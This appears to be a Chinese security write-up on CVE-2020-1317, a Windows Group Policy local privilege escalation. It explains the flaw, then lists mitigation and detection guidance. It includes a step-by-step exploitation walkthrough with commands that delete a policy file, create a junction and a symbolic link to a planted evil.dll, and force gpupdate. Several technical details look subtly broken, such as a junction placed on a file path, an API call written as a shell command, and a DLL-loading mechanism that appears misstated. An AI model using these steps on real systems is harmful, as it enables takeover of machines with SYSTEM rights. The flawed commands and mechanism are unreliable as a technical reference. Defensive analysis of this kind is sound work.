Windows Group Policy存在漏洞,攻击者可获取管理员权限
字数 1468 2025-08-15 21:31:05
Windows Group Policy 漏洞 (CVE-2020-1317) 技术分析与防御指南
漏洞概述
CVE编号: CVE-2020-1317
影响范围: Windows Server 2008及之后所有Windows版本
漏洞类型: 本地权限提升(LPE)
发现者: CyberArk安全公司
披露时间: 2019年6月17日
修复时间: 2020年6月补丁日
技术背景
Group Policy Client服务(gpsvc)
- 以SYSTEM权限运行,拥有管理员级别权限
- 负责检查并应用来自域控制器的组策略更新
- 定期或手动(通过gpupdate)检查策略更新
组策略存储位置
- 本地存储路径:
%LocalAppData%\Microsoft\GroupPolicy\History\ - 示例路径:
C:\Users\[user]\AppData\Local\Microsoft\GroupPolicy\History\{szGPOName}\USER-SID\Preferences\Printers\Printers.xml
漏洞原理
核心问题
- 权限配置不当: 普通用户对组策略历史文件有完全控制权限
- 符号链接攻击: 攻击者可创建指向恶意DLL的符号链接
- 服务上下文滥用: gpsvc以SYSTEM权限处理这些文件
攻击流程
- 攻击者识别最近使用的组策略GUID
- 定位并删除策略文件(如Printers.xml)
- 创建NTFS挂载点到\RPC控件
- 创建指向恶意DLL的符号链接(伪装成策略文件)
- 触发gpupdate强制策略更新
- gpsvc服务加载并执行恶意DLL,获得SYSTEM权限
利用步骤详解
-
枚举组策略GUID
dir C:\Users\[user]\AppData\Local\Microsoft\GroupPolicy\History -
确定活跃GUID
- 检查目录修改时间,找到最近更新的GUID目录
-
导航至用户SID子目录
cd C:\Users\[user]\AppData\Local\Microsoft\GroupPolicy\History\{GUID}\{USER-SID} -
识别目标策略目录
- 检查各子目录(如Printers, Devices等)的修改时间
-
删除原始策略文件
del Printers\Printers.xml -
创建符号链接
mklink /J Printers\Printers.xml \RPC ControlCreateSymbolicLink \RPC Control\Printers.xml C:\Windows\System32\evil.dll -
触发策略更新
gpupdate /force
影响评估
- 权限提升: 普通用户→SYSTEM权限
- 绕过安全机制: 可绕过反恶意软件和安全加固措施
- 持久性: 可建立持久后门
- 网络影响: 域环境中可横向移动
修复方案
官方补丁
- 安装Microsoft 2020年6月安全更新
- 补丁KB4561608(Windows 10 v1903/1909)
- 补丁KB4561616(Windows 10 v2004)
临时缓解措施
-
限制目录权限
icacls "%LocalAppData%\Microsoft\GroupPolicy\History" /deny Everyone:(F) -
禁用符号链接创建
- 组策略: 计算机配置→Windows设置→安全设置→本地策略→用户权限分配→创建符号链接
-
监控可疑活动
- 监控对GroupPolicy目录的异常修改
- 监控频繁的gpupdate执行
检测方法
-
日志分析
- 事件ID 4663: 对GroupPolicy目录的文件删除操作
- 事件ID 4688: 异常的gpupdate进程创建
-
文件系统监控
- 监控Printers.xml等策略文件的异常修改
-
进程监控
- 监控gpsvc加载异常DLL的行为
最佳实践
-
最小权限原则
- 限制普通用户对系统目录的写入权限
-
定期更新
- 确保所有系统及时安装最新安全补丁
-
安全审计
- 定期审计组策略配置和文件权限
-
网络分段
- 限制域内计算机的横向通信能力
参考资源
- Microsoft安全公告: CVE-2020-1317
- CyberArk完整报告: Group Policy Vulnerabilities
- Microsoft补丁指南: June 2020 Security Updates